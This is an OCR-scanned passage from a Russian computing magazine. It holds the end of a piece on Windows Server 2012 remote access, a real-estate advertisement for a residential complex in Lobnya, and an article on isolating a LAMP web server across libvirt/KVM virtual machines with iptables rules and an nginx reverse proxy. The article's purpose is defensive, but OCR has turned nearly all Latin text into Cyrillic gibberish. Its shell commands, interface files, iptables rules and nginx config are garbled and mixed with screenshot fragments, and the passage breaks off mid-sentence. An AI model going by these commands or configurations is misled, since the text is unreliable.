вать решения по МВ от сторонних поставщиков. 
Сама служба РВА$ поддерживает НР умеющий 
динамически обновлять маршрутную информа- 
цию. Кроме того, в \\т 2012 доступна функция 
объединения сетевых карт, позволяющая также 
организовать балансировку нагрузки и обеспечить 
отказоустойчивость (ЕВРО). 


Консоль управления удаленным доступом 
$ ет = и Чин —— 
1! КОНФИГУРАЦИЯ ‚жд Установка удаленного доступа 

| = 


Ш МОНИТОРИНГ "Настройте =! - нес иУРН. 
5 СОСТОЯНИЕ ОПЕРАЦИЙ ы. 


Ш > Задачи 
Общие ^ 


Управление удаленным се... 


Перезагрузка конфигурации 


ТОЯНИЕ У, | кл $ 
8 СОСТОЯНИЕ УДАЛЁННОГО || настройка удаленного Виртуальная частная сеть (УРМ ^ 


Я отчеты Открыть 
Параметры ОнестАссез; и УРН еще не настроены. Выберите мастер. Ими = 
Дополнительные сведения ^ 


Подробнее об удаленном... 


Е ммм ЗЕВУ + Запустить мастер начальной настройки 


используйте этот мастер, чтобы быстро настроить ОигестАссевз и УРН с использованием 
рекомендованных параметров по умолчанию. 


+ Запустить мастер настройки удаленного доступа 


Используйте этот мастер, чтобы настроить О/гестАссезз и УРН < использованием 
пользовательских параметров. 


Мастер начальной настройки открывзется только при первом запуске консоли 

й управления удаленным доступом. После завершения работы с ним запустите мастер 
‘мастройки у; Го "Настройка" и измените параметры ОместАссез$ и 
УРМ. 


О ыы, 


В\М/т 2012 Опес{Ассе$$ интегрирован с ВВА$ 


Выберите топологию сети сервера. 

®) Граница 

О За пограничным устройством (с двумя сетевыми адаптерами) 
О За пограничным устройством (с одним сетевым адаптером) 


В этой топологии сервер удаленного доступа развернут на границе внутренней 
корпоративной сети и настроен с двумя адаптерами. Один адаптер подключен к внутренней 
сети. Другой подключен к Интернету. 


Введите общедоступное имя или 1Р\4-адрес, используемые клиентами для подключения к 
серверу удаленного доступа: 


< Назад Далее > 


При настройке сервера ВВА$ потребуется выбрать 
топологию 


141006, Московская область, 
А М С т О п И т г Мытищи, Олимпийский проспект, д. 48 
грРЧААа компани И Тел.: (495) 660 96 З1, (495) 662 74 50, 
факс: (495) 660 96 41 


ЖИЛОЙ КОМПЛЕКС 


«МЕЩЕРИХИНСКИЕ 
ДВОРИКИ»,, Г. ЛОБНЯ 


Группа компаний «Монолит» приглашает к зна- 

а комству с новыми жилыми домами в комплек- 
о т т Ет нЕ се «Мещерихинские дворики» на улице Моло- 
= дежной уютного подмосковного города Лобня. 


До места встречи можно добраться от м. Алтуфьев- 
ская автобусом №459 или с Савеловского вокзала на 
пригородной электричке до ст. Лобня далее 7-10 мин. 
автобусом №1. Ближайшие транспортные магистра- 
ли — Дмитровское, Ленинградское шоссе. 


— 
ы. 


|| 


3 МН тт 


| и В жилом комплексе «Мещерихинские дворики» 
| | _ и — вас ждут два прекрасных 17-этажных двухподъезд- 
ы ных дома под номерами 14а и 14Б. Это - надежные 
монолитно-кирпичные здания, оснащенные всем 
необходимым для жизни, в том числе грузовым 
и пассажирским лифтами. 


РБ 


ЧЫСГХ 


Здесь вы сможете выбрать для себя светлые и про- 
сторные квартиры современной планировки - одно, 
двух и трехкомнатные. В квартирах предусмотрены 
пластиковые стеклопакеты, радиаторы с терморегуля- 
торами, электроразводка, застекленные лоджии и т.д. 


г = 


Для любителей прогулок организована зона отдых, 
украшенная декоративными кустарниками и деревья- 
ми, благоустроенная игровая площадка для детей, 

а для автомобилистов -— стоянка. Молодых родителей 
порадует новый детский сад в шаговой доступности. 


ТАЪЯ. т у 
Ч] № | 
РТВ 


[В 
АУ” 


Группа компаний «Монолит» надеется, что после пер- —. 
вой же встречи с новой квартирой, у Вас возникнет с 
ней взаимная симпатия и долгие надежные отношения. 


Условия приобретения квартир: рассрочка пла- 

тежа, ипотека, взаимозачет Вашей старой квартиры 

на Вашу новую. Возможны скидки при условии 100% 
оплаты и использовании ипотечного кредита. 


л\\ ПО ВОПРОСАМ ПРИОБРЕТЕНИЯ КВАРТИР (495) 739-93-93 


(«МОНОЛИТ НЕДВИЖИМОСТЬ) 
МОСКВА, ПРОЕЗД СЕРЕБРЯКОВА, Д. 14, СТР. 9 


ГРУППА КОМПАНИЙ «МОНОЛИТ» - ОДНО ИЗ КРУПНЕЙШИХ ПРЕДПРИЯТИЙ-ЛИДЕРОВ 
МОСКОВСКОЙ ОБЛАСТИ, ДЕЙСТВУЮЩИХ НА СТРОИТЕЛЬНОМ РЫНКЕ С 1989 ГОДА. 
ОСНОВНЫМ НАПРАВЛЕНИЕМ ДЕЯТЕЛЬНОСТИ ГРУППЫ КОМПАНИЙ «МОНОЛИТ» ЯВЛЯЕТСЯ 
ВОЗВЕДЕНИЕ ЖИЛЫХ ЗДАНИЙ И ОБЪЕКТОВ СОЦИАЛЬНОГО НАЗНАЧЕНИЯ ПО ИНДИВИ- 
ДУАЛЬНЫМ ПРОЕКТАМ. В ОСНОВЕ ЛЕЖИТ ТЕХНОЛОГИЯ МОНОЛИТНОГО ДОМОСТРОЕНИЯ. 
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С подробными схемами планировок квартир 

и проектной декларацией можно ознакомиться 
на сайте м/мим!.дК-топоШ.ги или в офисе 
компании «Монолит недвижимость» 


ви 


Реклама 


Группа «Монолит» активно работает с ведущими Город Лобня расположен в лесопарковой зоне 
банками по программам ипотечного кредито- Подмосковья, в ближайшем окружении имеются 
вания. Особое внимание уделяется правовой живописные озера и пруды. Недалеко от Лобни - 
защищенности клиентов, приобретателей ансамбль бывшей усадьбы Марфино, несколько 
жилья и нежилых помещений. центров русских народных промылов. Культурная 


жизнь города сосредоточена в основном в Куль- 
турно-досуговом центре «Чайка» и парке Культуры 
и Отдыха, есть театры и музеи, художественная 
галлерея. Для любителей спорта - два бассейна, 
ледовый каток, Дворец спорта «Лобня». 
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АВ ‘соо-монолит АРЕНДА (985) 727-57-62 
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ПОДНИМАЕМ 
ВЕБ-СЕРВЕР р 
С МАКСИМАЛЬНОИ 
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Евгений Зобнин 
ехесой.ги 


ИЗОЛЯЦИЕЙ СЕРВИСОВ 


Обычно, когда встает задача 
поднять среднестатистический 
веб-сервер, администратор вы- 
бирает одну достаточно произ- 
водительную виртуальную или 
физическую машину, которая 
способна справиться с ожидаемой 
нагрузкой, и поднимает на ней стек 
[ АМР, включающий в себя Араспе, 
РНР, МУЗСОЕ, а также, возможно, 
метсаспед, пошх и реверс-прок- 
си. Однако это далеко не самый 
эффективный и безопасный сце- 
нарий, лучшим решением будет 
разнести все компоненты стека 


по разным виртуальным машинам. 


ВВЕДЕНИЕ 

Стандартная инсталляция (Е)АМР — это Шпих/ 
В$0-машина, на которой запущены все компо- 
ненты веб-сервера. Такую связку очень легко 
настроить, однако она имеет целый ряд недо- 
статков. Во-первых, она небезопасна: взломав, 
например, веб-сервер, злоумышленник сможет 
получить доступ к файлам веб-сервера, базам 
МуЗСОЕ, а если веб-сервер работает на физиче- 
ской машине без всякой изоляции, то и к самой 
машине. 

Во-вторых, классический АМР-сервер очень 
плохо масштабируется. В случае повышения на- 
грузок придется менять всю архитектуру, вводя 
в нее новые веб-серверы, базы данных, прикру- 
чивать балансировщик нагрузки, изменять кон- 


фигурацию. Система не обладает модульностью, 
которая бы позволила вводить в строй новые сер- 
висы и подсистемы, не ломая архитектуру. 

В-третьих, по мере роста в ходе наращива- 
ния мощности классическая конфигурация будет 
постоянно усложняться, что затруднит ее сопро- 
вождение и понимание архитектуры. По тем же 
причинам появятся серьезные проблемы с мони- 
торингом. 

В общем и целом, классический АМР в пер- 
спективе неэффективен, но все его проблемы 
можно решить за счет разнесения всех ком- 
понентов сервера по отдельным виртуальным 
машинам, которые станут высокоуровневы- 
ми логическими единицами, более удобными 
для управления. 


ВИРТУАЛЬНЫЙЕАМР 

Идея виртуализации ГАМР состоит в том, чтобы 
разнести Араспе, МузОЕ, тетсаспеча в отдель- 
ные виртуальные серверы и добавить к ним еще 
один виртуальный сервер с реверс-прокси в лице 
пах. За счет разделения сервисов такая конфи- 
гурация будет на порядок безопаснее, масштаби- 
руемее и удобнее в управлении. 

Современные системы виртуализации позво- 
лят легко клонировать и создавать новые вирту- 
альные окружения, которые можно прозрачно пе- 
реносить на другие физические машины с целью 
создания дополнительных нод при повышении 
нагрузки. Интерфейс управления ВМ позволит 
наглядно видеть всю конфигурацию и управлять 
ей. Реверс-прокси на отдельной виртуальной 
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машине одновременно выполнит функции сете- 
вого экрана и балансировщика нагрузки, в случае 
введения в строй новых инстанций Араспе или 
МуЗОЕ. 

Далее я пошагово опишу, как создать такую 
схему с использованием стандартных средств 
управления виртуализацией в Ипих на базе уч 
и ОЕМУ/К\М. Система управления ВМ Помм ис- 
пользуется во многих высокоуровневых облачных 
платформах, поэтому в будущем читатель сам 
сможет выбрать более подходящий для него ин- 
струмент управления и мониторинга. 


ШАГ1. УСТАНОВКА НВ\УАТИ СОЗДАНИЕ 
ШАБЛОНОВ ВМ 
Итак, у нас есть машина под управлением Вефап/ 
Обити Ипих (на самом деле подойдет и Еедога, 
но придется учесть нюансы в различиях системы 
инициализации, конфигурирования и установки 
пакетов). Мы должны создать на ней инфраструк- 
туру, с помощью которой сможем быстро и легко 
подготовить ферму виртуальных серверов тре- 
буемой конфигурации. Для этого необходимо 
сделать три вещи: создать виртуальный сетевой 
мост, который будет использоваться для комму- 
никации ВМ друг с другом и доступа реверс-прок- 
си во внешний мир, установить и настроить ми 
и подготовить набор шаблонов ВМ. Настройка 
сетевого моста в Чбитщи происходит так: 
1. Устанавливаем инструменты управления мо- 
стом: 


$ зи4о ар*-веф 1п${а11 г1аве-и{11$ 


2. Останавливаем основной сетевой интерфейс 
и редактируем настройки сети: 


$ зиао 1аомп ефи@ 

$ зи4о \1 /ефс/пе%могКк/1пегРасе$ 

ачфо 1о 

1фасе 1о 1пеф ТоорБаск 

ачфо Бг@ 

1Расе Бг@ 1пеф $%аЕ1с 
аааге$5 192.168.0.10 
пефмогк 192.168.0.0 
пефта$К 255.255.255.0 
бгоааса${ 192.168.0.255 
сафемау 192.168.0.1 
Бг1аве_рогЕ$5 ефйо 
6г1аве_+а 9 
Бг1аве_Ве11о 2 
6г1а5е_тахаде 12 
Бг1аве_5Ер о++ 


В качестве 1Р-адреса и маски подсети здесь 
следует использовать физические адреса. 


Ферма строгого режима 


Предполагается, что сервер находится в ло- 
кальной сети, а доступ во внешний мир орга- 
низован с помощью шлюза. 

3. Поднимаем наш бридж: 


$ зиао 1Фир Бг@ 


4. Проверяем его работоспособность: 


$ сиао БгсЕ1 $Иом 
Ьго 8000.000е0сЬ30550 


уе5 ео 


Теперь следует установить П6\мп: 


$ зидо арЕ-веф 1п$%а11 Кут <= 
116\у1гЕ-61п 17115 


Проверяем работоспособность ИБмт: 


$ зиао м1г$И --соппесе ‹- 

дети: ///зузет мег$1оп 
Скомпилировано на базе библиотеки: ‹* 
О ее) 
Используется библиотека: 116\1г* 1.1.0 


Ну и последнее. Создаем виртуальную маши- 
ну. Пока нам нужна только одна, она будет выпол- 
нять роль шаблона, который мы будем клониро- 
вать для создания новых ВМ: 


$ зи4о у1гЕ-1п$$а11 --соппесе += 
дети: ///зуз{ет \ 
--пате %етр \ 
--гат 1024 \ 
--УПС \ 
--05-фуре 11пих --0$-уаг1ап® += 
УТВЕТОРО А 
- -ассе1егате \ 
- -пефмогк=Бг1а5е:Ьг0 \ 
--91$К раЕИ=/маг/116/116\1г/+- 
1таде$ /Фетр. 11$, $17е=100 \ 
--сагом /%тр/*= 
ибипи-13.04-зегуег-1386.1$0 \ 


Здесь все просто. Новая ВМ будет иметь имя 
{етр, использовать 1 Гб памяти, диск размером 
100 Гб (про запас, диск будет динамически расти), 
подключаться к сети через наш мост и грузиться 
с образа диска /итр/ибити-13.04-$егуег-1386.150. 
Чтобы проверить, что машина действительно за- 
пустилась, используем команду \мг$П: 


$ зиао м1г$И --соппесе += 
дети: ///ъзузет 115% 


ачто 1о 
1Тасе 1о 1пефт 1оорБаск 


ачфо Бий 

1Тасе БиЙ 1пеф зТтат1с 
аЧагез$з 192.168.9.18 
пефшогКк 192.168.8.8 
петтазкК 255.255.255.0 
огоанса5е 192,158. И. 255 
дафтешац 192.168.8.1 
Биг199е_рогТт$ етпб 
Бг199е_т9 9 
Бг199е_Пе]11о 2 
Бг199е_тахаде 12 
Бг199е_$фр отт 


и | 1 > 


Новая 


Название 
У [осаШоз{ (ОЕМУЦ) 


м1 
Работает 


мт? 
Работает 


мтзЗ 
Работает 


мт4 
Работает 


гии 


мт5 
Работает 


мтб 
Работает 


90: 


Настраиваем виртуальный сетевой мост 


Файл Правка Вид Помощь 


Открыть Запустить Приостановить Выключить 


1.57 


Если ВМ под именем{етр есть в списке, мож- 
но соединиться с ней при помощи у[-мемег. Это 
графический УМС/ЗР!СЕ-клиент, поэтому, если 
на сервере нет графического интерфейса, можно 
использовать удаленную машину: 


$ зи4о арЕ-веф 1п$%а11 \м1г*-у1емег 
$ м1гЕ-м1ешег -с дети+$5$И: //== 
гоо*@ТР-сервера/зу$ет %етр 


Далее следует просто установить дистрибу- 
тив, не указывая никаких специфических опций 
и назначив ПР-адрес из подсети, прописанной 
в настройках моста. После установки завершаем 
работу машины. 


ШАГ2. ПОДНИМАЕМ МУЗОЕ 

Теперь следует использовать наш готовый ша- 
блон для создания всех необходимых серверов 
из связки ГАМР Напомню, что нам нужны будут 
отдельные серверы для пдашх, выступающего 
в роли реверс-прокси, для Араспе/РНР, МУЗОЕ 
и тетсасвеа, если таковой необходим. Начнем 
с настройки МУЗОЕ. Чтобы создать новую ВМ 
на базе уже существующей, используем команду 
м-сопе: 


$ зи4о у1г&-с1опе -о фетр -п муза1 - «" 
/маг/116/116\1гЕ/1таёе$/ту$а1.1т8 


Так мы получим новую ВМ, аналогичную уже 
существующей. Теперь наша задача — запустить 
эту машину, зайти на нее с помощью все того же 
у\-ме\мег, а дальше — установить и запустить 
на ней связку Араспе/РНР Запускаем и входим: 


$ зиао у1г5И зфаг® ту$а1 
$ м1гЕ-м1ешег -с дети+$5$И: //«== 
гоо{@ТР-сервера/зузет ту$за1 


Вторую команду следует выполнять опять же 
с удаленной машины, имеющей графический 
интерфейс. Первое, что делаем, войдя на маши- 
ну, — это изменяем ее |Р-адрес, который достал- 
ся в наследство от шаблонной ВМ: 


$ мт /ефс/пемогК/1пег+асе$ 

ачфо 1о 

1фасе 1о 1пеЕ ТоорБаск 

ачфо ефпо 

1Расе ефИ@ 1пеф $фае1с 
аааге$з5 192.168.0.11 
пефмогк 192.168.0.0 
пефта$К 255.255.255.0 
бгоааса${ 192.168.0.255 
бсафемау 192.168.0.1 


Ш Г] 


Е 


а 


Использование СРЫУ 


Для мониторинга серверов удобнее всего использоватьуй{-тападег 


135 $УМ/АСК 


Теперь устанавливаем и настраиваем Му$О(: 


$ эи4о ар*-веЕ 1п$%а11 ту$а1 «= 
ту$а1 -зегуег 
$ зиао м1 /еЕс/ту. сп 


[61па] 
61па-адаге$$=192.168.0.11 


Также сразу добавляем в файл необходимые 
строки конфигурации (обсуждение того, какие 
именно, выходит за рамки данной статьи) и пере- 
запускаем сервер: 


$ зиао зегу1се туза14 гезаг* 


Теперь можно создать пользователей и базы 
данных. В качестве завершающего шага сконфи- 
гурируем праЫе$ так, чтобы он пропускал только 
пакеты для МуЗО(: 


$ зи4о 1рфаБ1ез -А ТМРИТ -} ОВОР 
$ зи4о 1р%аБ1ез -А ТМРИОТ -т $фафе ‹* 
--5фаЕе МЕМ -м ср -р ср --арогЕ += 


9396-11 АССЕРТ 


Чтобы настройки вступили в силу после пере- 
загрузки, эти строки следует добавить в /е\с/ 
гс. 1оса1 (без зиао, естественно). 


ШАГЗ. ПОДНИМАЕМ МЕМСАСНЕО 

Теперь создадим и поднимем сервер тетсаспеа. 
Возможно, он и не понадобится в твоей конкрет- 
ной конфигурации, но преднастроенный сер- 
вер определенно стоит держать про запас. Если 
в какой-то момент потребуется использование 
агрессивного кеширования, все необходимое 
для этого уже будет в твоем арсенале, останется 
только запустить готовый сервер и подключить 
кеширование на стороне Араспе/РНР. 

Как и в случае с сервером МуЗСЕ, перво-на- 
перво клонируем заранее подготовленный ша- 
блон, запускаем виртуальный сервер и подклю- 
чаемся к нему: 


$ зидо м1г*-с1опе -о %етр -п <= 
тетсасйеяа -+ /уаг/116/116\1гЕ/+= 
1таге$ /тетсаспеа . 115 


$ зидо млг5И $$агф тметсасйеа 
$ м1гЕ-утемег -с дети+$$1: / /« 
гоо*@ТР-сервера/зузет тетсаспеа 


Меняем ГР-адрес, как показано выше, на этот 
раз можно использовать адрес 192.168.0.12 или 
любой другой на твой вкус. Главное — запомнить, 
что где находится. 

Далее устанавливаем сам сервер: 


$ зи4о ар+-вее 1п$%а11 тетсасвеа 


Открываем настройки и пишем: 


РОВ. 
И5ЕВ="тетсасйеа"; 

МАХСОММ= "1024"; 
САСНЕТИЕЕАЬ 

ОРТТОМ№$="-1 192.168.0.12 -1" 


Перезапускаем сервер: 


$ зидо зегу1се гезфагЕ тетсасйеа 


Добавляем правило р{аШе$, закрывающее 
все порты, кроме порта тетсаспеа: 


$ зи4о 1рЕаб1ез -А ТМРОТ -} ОВОР 

$ зиао 1рЕаб1ез -А ТМРОТ -т $Жафе ‹* 
--5фаЕе МЕМ -м ср -р ср --ароге «= 
11211 -1 АССЕРТ 


Добавляем эти же строки в /е{с/гс.1оса1. 
Если в данный момент тетсаспеа не нужен, 
можно его остановить: 


$ зиао улг$Н фор тетсасНея 


Когда сервер понадобится, достаточно будет 
отдать команду на запуск, и он появится в вирту- 
альной сети. 


ШАГ4. ПОДНИМАЕМ АРАСНЕ /РНР 

Предпоследний и самый важный шаг — это уста- 
новка и настройка Араспе/РНР К сожалению, 
разнести эти два сервиса по разным серверам 
мы не можем в силу архитектуры РНР выполнен- 
ного в виде Араспе-модуля. Поэтому они будут 
на одной виртуальной машине. Хотя если бы речь 


«сараб11111е$5> 


<Во$1>» 


«сри» 


1МЕО 
Живая миграция с помо- 
щью пом выполняется 
в одну команду: зидо 
У1г$И т15гафе 
--11уе имя_вм 
дети+$$И : //По${2. 


«Теафиге пате= 
«Теафиге пате= 
«Теафиге пате= 
«Теафиге пате= 
«Теафиге пате= 


сот/ зу ет. «Теафиге пате= 
Для ИБМИ есть пре- <Теафиге пате= 
ы «Теафиге пате= 
красный графический тента тат 
инструмент управления о 


«Теафиге пате= 
«Теафиге пате= 
«Теафиге пате= 
«Теафиге пате= 


под названием м{- 
тападег. Он позволяет 
выполнить все описан- 

ное в статье, просто 

кликая мышкой. 


<ци19>49520899-ВЬ16Ь-49'75-Бс93-В91863'7'79661</ци19> 


«агсН»х86_64</агсН» 

«тоде 1 >рпепом< /тоде1» 
«уепдог>АМО< /уепдог» 

«форо1о94ц $0сКе{$='1' согез='2' +Бгеад$='1'/>» 
«Теафиге пате=' ш9+ '/> 
'5К1п14'/> 
Би. 

‘о$уш'/> 
'Запошрге{е+сВ ' /> 
'5зе4а'/>» 

‘абт’/> 
'сг81едасу' /> 
‘ехфар1с'/> 
‘стр_1едасу' /> 

'] аРт_1т'/>» 
ГаЕ5сри и» 
‘р9ре19Ь'/> 
‘рорсп+'/> 
`ЕХ16 > 

«Теафиге пате='В+'/> 


Перед использованием ПБуй{ следует проверить возможности виртуализации 
машины спомощью команды ут $П сараб!ИШе$ 
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шла о РуУПоп, мы могли бы легко вынести им/54!- 
сервер на отдельную машину. 
Вновь клонируем и запускаем сервер: 


$ зи4о \1гЕ-с1опе -о %етр -п арасйе += 
-Р /уаг/116/116\1г*/1тазе$/араспе. 115 

$ зиао м1г5И зфагЕ арасНе 

$ м1гЕ-м1ешег -с дети+$5$И: / /== 
гоо{@ТР-сервера/у$ет араспе 


Правим сетевые конфиги. Пусть Араспе будет 
у нас находиться по адресу 192.168.0.13. Далее 
ставим Араспе/РНР и необходимые модули: 


$ зидо арЕ-веф 1п$%а11 араспе2 

$ зи4о арЕ-веф 1п$%а11 рНрб «= 
11Барасйе2-тоа-рйр5 рИр5-ту$а1 «= 
рир5-тетсаспе 


Здесь мы устанавливаем только самые необ- 
ходимые РНР-модули, нужные в нашей голой кон- 
фигурации: МУуЗОЕ и тетсаспе. Понадобятся ли 
другие модули, будет зависеть от потребностей 
конкретного веб-сайта. 

Далее создаем минимально необходимый 
конфиг веб-сервера: 


$ зиао м1 /ефс/НЕра/соп+/НЕЕра. соп+ 
[15еп 192.168.1.13:80 
БоситепЕВоо* "/маг/ммм/ВЕт1" 


<О1гесфогу " /маг/ммм/ ИТ" > 
Тпдехез Тпс1иде$ Ео11омбутЁЕ1пК$ «= 
ФутЕ1пК$1+ОмпегМаесй Ехесс@т ‹= 
Ми11\/1ем$ 
Ор{1оп5 Тпаехез$ Ро11ом5утЕ1пК$ 
А11омО\уегг1ае А11 
Огдег а11ом,аАепу 
А11ом {гот а11 


</01гесфогу> 


Настройки РНР5 оставляем пока как есть. Раз- 
мещаем наш сайт в каталоге /маг/мммми/ил1, пере- 
запускаем Араспе: 


$ зиао зегу1се гезфагЕ арасйе 


Последним шагом добавляем правило рфаЫе5 
для пропуска трафика на 80-й порт: 


$ зидо 1рЕаб1ез -А ТМРОТ -} ОВОР 
$ зидо 1рЕаб1ез -А ТМРОТ -м $фафе ‹= 


--5ЕаЕе МЕМ -р ср --арогЕ 80 -] АССЕРТ 


ШАГ5. ПОДНИМАЕМ МС1МХВРЕЖИМЕ 
РЕВЕРС-ПРОКСИ 
Заключительная часть настройки — поднятие 
веб-сервера потх в режиме реверс-прокси. 
По большому счету наша конфигурация могла 
бы обойтись и без него, и мы могли бы пробро- 
сить трафик с 80-го порта внешнего шлюза сразу 
на адрес 192.168.0.13. Однако в использовании 
пашх есть один большой плюс — он позволяет 
создать задел для будущего расширения нашей 
конфигурации, выступая в роли балансировщика 
нагрузки на несколько серверов, а также защи- 
тит от ряда угроз, выступая в роли брандмауэра 
прикладного уровня. 

Первым делом клонируем шаблон и запуска- 
ем виртуальную машину: 


$ зиао м1гЕ-с1опе -о %етр -п па1пх -+ «1 
/маг/ 116/116 \1гЕ/1тазе$ /пё1пх.1т8 

$ зиао у1г$И зфагЕ пё1пх 

$ м1гЕ-мтемег -с дети+$51 : / /+= 
гоо{@ТР-сервера/зузет пё1пх 
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Файл Виртуальная машина Вид Отправить комбинацию клавиш 


Е о р 00 [п х = 


Консоль Подробности ' Запустить Пауза Выключение Во весь экран 


гоуреЧ соттап@$:; 


Оота1п Мападетеп+ (Бе1р Кецшога 'дота1п’): 
а++асп-Че\у1се а+фасп Чеу1се Тгот ап ХМЕ Т111е 
а+Тасп-91$К аЁфаср 91$К Чеу1се 
а1Тасп-1пТегТасе а1+фасп пефшогК 1птегТасе 
ацфо$фагт ацфо$таг{ а Чота!п 
Ь]КЧеу1отипе беф ог диегу а Б1осК деу1се 1/0 Тип1пд рагатетегз, 
Ь1 к1отипе беф ог зе Б1К1о рагатетег$ 
Ь]осксотт1 + бфаг+ а Ь1осК сотт1{+ орега\1оп. 
Ь1осКсору Зфагф а Ь1осКкК сору орега{1оп, 
Ь1оск ]оБ Мападе ас{т1\уе Б]оскК орега{1оп$ 
Б]оскри1 1 Рору1ате а 91$К Тгот 11$ Баск1пд 1таде. 
Ь1оскге51=е Ре51хе Б1оск Чеу1се от дота1п. 
свапде-теЧ1а СРапде тед1а от СО ог Т]орру 9г1\уе 
соп5о]е соппес{т То Т1Ве диуез{ соп$о1е 
сру-Базе!1 1пе сотруфе Базе11пе СРУ 
сотраге Пот СРУ ш1{А а СРУ Чезсг1Бед Бу ап ХМ Т11е 


тпаЦ 
М/е[соте 


чо юсаисацоп 
АзГипапиу 
Ваваза !пдопез$а 
ВозапзК! 

Сака(а 
СезИпа 


Сутгаед 


сру-сотраге Бапзк м 

сру-51а15 5Пош Чдота1п сру $1а{11511с$ Рецёзсв 

сгеа{фе сгеафе а Чота1п Тгот ап ХМЬ 111е ЕезН чаи 
Че! 1пе деР1пе (Биф 9оп'+ ${+аг4) а Чота1п Ргот ап ХМЕ +11е 

де5с Рош ог 5е{ Чота1п'5 Чезсг1р#1оп ог 1141е а Тгу УБупЕи юп5ка[ ОБипЕи 


ЕбрегапЕо 

Е\ц$Кага 

Егапса! 

Саейде 

Са{едо ог! уоу'ге геаду, уоц сап па ЦБипви а(опд$!е (ог 1п$Геа4 оЕЁ) уоуг 
шалиильль лье ьль пала ыыы ПГ а йа Ь Бо Бы ь [аль 


дез1гоу 
Чефаср-Чеу1се 
Чефасв-91$К 


дез1фгоц (зфор) а Чота1п 
Чефасп Чеу1се Тгот ап ХМ Т!1е 
Чефаср 91$К Чеу1се 


Уоц сап (гу ЧБиупЕу мИЕВочцЕ паК!пд апу сВапдез Ко уоуг сотрибег, ЧгесЦу 
Ггот 5 СО. 


Ми — мощнейший инструмент управления ВМ 


Далее правим сетевой конфиг (в этом приме- 
ре я использую адрес 192.168.0.14) и устанавли- 
ваем пах: 


$ зи4о ар-вее 1п$%а11 пё1пх 
Конфигурация веб-сервера будет такой: 


ирз{геат арасйе { 
зегуег 192.168.0.13:80; 


зегуег { 
115{еп 192. 168.0. М.88: 
5егуег_пате иммм.ехатр1е. сот; 
ассе$5_108 /уаг/1о05/п51пх/105/+«= 
илл. ехатр]е.ассе$$.1о5 та1п; 
еггог_105 /\маг/108/п51пх/105/-= 
мил. ехатр]е .еггог. 105; 
го /ч5г/-паге/п1пх/Вт1; 
1паех 1пдех.Н%т1 1пдех.В*пт; 
Тоса1опт / { 
ргоху_ра5$$ Ифр: //араспер; 
ргоху_пех®_ир$Егеам еггог += 
{1теочЕ 1пуа1149_Пеааег += 
КЕЕр_500 ИЕЕр_502 Пер 503 ‹ 
ИЕЕр_504; 
ргоху_гед1гесе о++; 
ргоху_Би{ег1пв о+ф; 
ргоху_5е{_Пеадег Но${ ‹= 
фНо5{; 
ргоху_5е*_Пеадег Х-Кеа1-ТР += 
$гето{е_аааг; 
ргоху_5е*_Пеааег ‹+ | 
Х-Рогмагдеа-Еог += 
$ргоху_а44а_х_Фогмагаеа_ог; 


Ничего особенного, самая стандартная кон- 
фигурация прокси, который отдает все получен- 
ные запросы указанному серверу, в нашем случае 
Араспе с !Р-адресом 192.168.0.13. Ее более чем 
достаточно для 90% задач. Перезагружаем пах, 
чтобы изменения вступили в силу: 


$ зи4о зегу1се пё1пх ге1оаа 


ДАЛЬНЕЙШИЕ ШАГИ 

Теперь у нас есть готовая инфраструктура, со- 
стоящая как минимум из четырех виртуаль- 
ных серверов: МуЗОЕ с адресом 192.168.0.11, 
петсаспея —  192.168.0.12, Араспе — 
192.168.0.13, потх — 192.168.0.14. Чтобы про- 
верить, что все виртуальные машины корректно 
функционируют, воспользуемся ми$П: 


УМС-клиент 


$ зидо м1г$й 115% 


Или с удаленной машины: 


$ зиао у1г$Н --соппесЕ аети+$5$Н: / /*= 
го0*@192.168.0.10/зуз{ет 115% 


Повторюсь, что это лишь базовая конфигу- 
рация, которая на данном этапе обеспечивает 
только работоспособность связки пашх + Араспе. 
Далее следует корректным образом отконфи- 
гурировать Араспе и РНР и поднять сайт, указав 
в его настройках адреса и порты серверов МуЗОЕ 
и тетсаспеач (если он будет использован). После 
проверки работоспособности всей связки сле- 
дует настроить маскарадинг пакетов, пришед- 
ших на порт 80 внешнего шлюза, так, чтобы они 
перенаправлялись на адрес 192.168.0.14, то есть 
на адрес пах. Он и будет точкой входа на сайт. 

Кроме того, рекомендую подправить настрой- 
ки р{аЫез всех серверов так, чтобы каждый из них 
мог общаться только с тем, с которым действи- 
тельно необходимо. Например, патх должен при- 
нимать пакеты только с адреса внешнего шлюза, 
а отдавать только на адрес сервера Араспе, порт 
80. Таким образом ты полностью изолируешь 
серверы друг от друга и в случае, если будет взло- 
ман, например, тот же пошх, его взломщик, не по- 
лучив права гост, вообще не сможет выбраться 
из песочницы. Дополнительным уровнем защиты 
станет настройка правил брандмауэра на сторо- 
не самого сервера, тогда взломщику не помогут 
даже права гост, он окажется замкнут внутри вир- 
туального сервера. 

Чтобы защититься от возможных проблем 
с конфигурацией и прочих сбоев, сразу после 
настройки окончательной конфигурации следу- 
ет сделать клоны всех серверов. В этом случае 
сбойный сервер можно будет быстро восстано- 
вить из априори работоспособной копии. Араспе 
и МУуЗОЕ таким образом, конечно, не восстано- 
вишь, так как они содержат динамически генери- 
руемые данные; эти данные можно заранее рас- 
положить на втором виртуальном диске, который 
достаточно будет подключить после восстановле- 
ния рабочей копии. 

Сделать все это можно тем же мп-с!опе, ука- 
зав дополнительный диск с помощью опции -+. 
Например (араспе базе — заранее сохраненная 
рабочая копия): 


$ зиао м1гЕ-с1опе -о араспе_Базе -п <= 
арасНе -+ /уаг/116/116\1гЕ/1таде$ /-= 
арасйе.1тв -+ /уаг/116/116\1гГЕ/+= 
1таде$ /ммм-4афа. 1т5 


Естественно, следует заранее внести не- 
обходимые строки в /ефс/Ф5%аБ. Кстати, идею 
с вынесением данных виртуальных машин на от- 
дельные диски можно использовать для шаринга 
данных между несколькими виртуалками, напри- 
мер в конфигурации с дополнительным сервером 
пашх для отдачи статики. В таком случае доступ 
к данным веб-сервера должны иметь сразу две 
виртуальные машины: Арасве и пах. Чтобы это 
организовать, можно использовать отдельный 
диск для данных и подключать его к обеим ВМ. 
Правда, в этом случае придется настроить бло- 
кировку диска; как это сделать, описано в офи- 
циальной документации (Помит.огаЛоскта.0171|. 

Что касается ресурсов виртуальных машин, 
а точнее, их правильного распределения между 
ВМ, то здесь ситуация следующая. Два главных 
ресурса — это память и используемые ядра про- 
цессора. ШЮм позволяет гибко управлять ими 
и изменять без необходимости пересоздавать 
и перезапускать ВМ. Например, для изменения 
количества выделенной виртуальной машине па- 
мяти можно использовать такую команду: 


$ улг$И сефтет тетсасйеа 1048576 +! 
ЕЕ СОНИЮ 


Она установит количество выделенной памяти 
